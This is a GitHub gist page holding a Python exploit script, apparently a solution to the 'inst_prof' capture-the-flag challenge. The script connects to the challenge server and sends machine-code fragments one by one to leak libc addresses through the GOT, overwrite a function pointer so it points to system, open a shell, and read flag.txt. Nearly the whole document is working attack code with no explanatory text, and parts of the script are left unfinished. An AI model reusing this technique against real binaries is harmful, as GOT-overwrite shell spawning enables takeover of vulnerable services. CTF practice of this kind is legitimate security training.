Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
import subprocess
import struct
import binascii
import random
import time
remote = True
if remote:
cmd = "nc inst-prof.ctfcompetition.com 1337"
else:
cmd = "./inst_prof"
pr = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out = open('payload','wb')
def send(s):
pr.stdin.write(s)
out.write(s)
pr.stdin.flush()
print("SEND:", s)
def recv(n):
line = pr.stdout.read(n)
print("RECV:", line)
return line
def send_command(data):
assert(len(data) == 8)
send(binascii.unhexlify(data))
return struct.unpack('<Q', recv(8))[0]
# 000000202050 000a00000007 R_X86_64_JUMP_SLO 0000000000000000 mprotect@GLIBC_2.2.5 + 0
# 000000202048 000900000007 R_X86_64_JUMP_SLO 0000000000000000 munmap@GLIBC_2.2.5 + 0
# 202038
offset_mprotect_got = 0x202050
offset_munmap_got = 0x202048
offset_main_got = 0x202038
offset_do_test_rtn = 0xac0 + 88
recv(26) # lets draw...
offset = offset_munmap_got - offset_do_test_rtn
# mov r13, rsp
send_command("4989e5c3")
# (inc r13) * 0x1000
send_command("49ffc590")
for i in range(3):
# mov r14b, offset[(8*i + 7):8*i]
send_command("41b6%02xc3" % ((offset >> (8*i)) & 0xff))
# mov byte [r13+ i], r14b
send_command("458875%02x" % i)
for i in range(3,8):
# mov byte [r13+i], al (al == 0)
send_command("418845%02x" % i)
# mov r14, qword [r13]
send_command("4d8b7500")
# mov r15, qword [rsp]
send_command("4c8b3c24")
# add r15, r14; ret
send_command("4d01f7c3")
def leak_libc():
for offset in [offset_main_got, offset_munmap_got]:
offset = offset - offset_do_test_rtn
# mov r13, rsp
send_command("4989e5c3")
# (inc r13) * 0x1000
send_command("49ffc590")
for i in range(3):
# mov r14b, offset[(8*i + 7):8*i]
send_command("41b6%02xc3" % ((offset >> (8*i)) & 0xff))
# mov byte [r13+ i], r14b
send_command("458875%02x" % i)
for i in range(3,8):
# mov byte [r13+i], al (al == 0)
send_command("418845%02x" % i)
# mov r14, qword [r13]
send_command("4d8b7500")
# mov r15, qword [rsp]
send_command("4c8b3c24")
# add r15, r14; ret
send_command("4d01f7c3")
# mov r15 qword [r15]
send_command("4d8b3fc3")
# mov qword [r13], r15
send_command("4d897d00")
# mov r14, qword [r13+0x7]
send_command("4d8b75f9")
# xor r12, r12
t = send_command("4d31e4c3")
# mov r12, r14
t1 = send_command("4d89f4c3")
dt = t - t1
if dt < 0:
dt = dt + (1 << 64)
print( "%x" % dt)
# mov r14, qword [r13+0x6]
send_command("4d8b75fa")
# xor r12, r12
t = send_command("4d31e4c3")
# mov r12, r14
t1 = send_command("4d89f4c3")
dt = t - t1
if dt < 0:
dt = dt + (1 << 64)
print( "%x" % dt)
# mov r14, qword [r13+0x6]
send_command("4d8b75fb")
# xor r12, r12
t = send_command("4d31e4c3")
# mov r12, r14
t1 = send_command("4d89f4c3")
dt = t - t1
if dt < 0:
dt = dt + (1 << 64)
print( "%x" % dt)
# mov r14, qword [r13+0x6]
send_command("4d8b75fc")
# xor r12, r12
t = send_command("4d31e4c3")
# mov r12, r14
t1 = send_command("4d89f4c3")
dt = t - t1
if dt < 0:
dt = dt + (1 << 64)
print( "%x" % dt)
pr.stdin.close()
print(pr.stdout.read())
out.close()
exit(0)
local_libc_system = 0x45390
local_libc_mprotect = 0x100b80
local_libc_munmap = 0x100b50
remote_libc_system = 0x46590
remote_libc_munmap = 0xf8110
if remote:
offset = -(remote_libc_system - remote_libc_munmap)
else:
offset = -(local_libc_system - local_libc_munmap)
# mov r13, rsp
send_command("4989e5c3")
# (inc r13) * 0x1000
send_command("49ffc590")
for i in range(3):
# mov r14b, offset[(8*i + 7):8*i]
send_command("41b6%02xc3" % ((offset >> (8*i)) & 0xff))
# mov byte [r13+ i], r14b
send_command("458875%02x" % i)
for i in range(3,8):
# mov byte [r13+i], al (al == 0)
send_command("418845%02x" % i)
shellcode= b'sh\0'
for i in range(len(shellcode)):
# mov r14b, shellcode[i]
send_command("41b6%02xc3" % (shellcode[i]))
# mov byte [r13+ 8 + i], r14b
send_command("458875%02x" % (i+0x8))
# mov r14, qword [r13]
send_command("4d8b7500")
# sub qword [r15], r14
send_command("4d2937c3")
# lea rbx,[r13+0x8]
send_command("498d5d08")
# mov rbx r13
# ";sh\0"
time.sleep(1)
send(b"cat flag.txt")
pr.stdin.close()
print(pr.stdout.read())
out.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment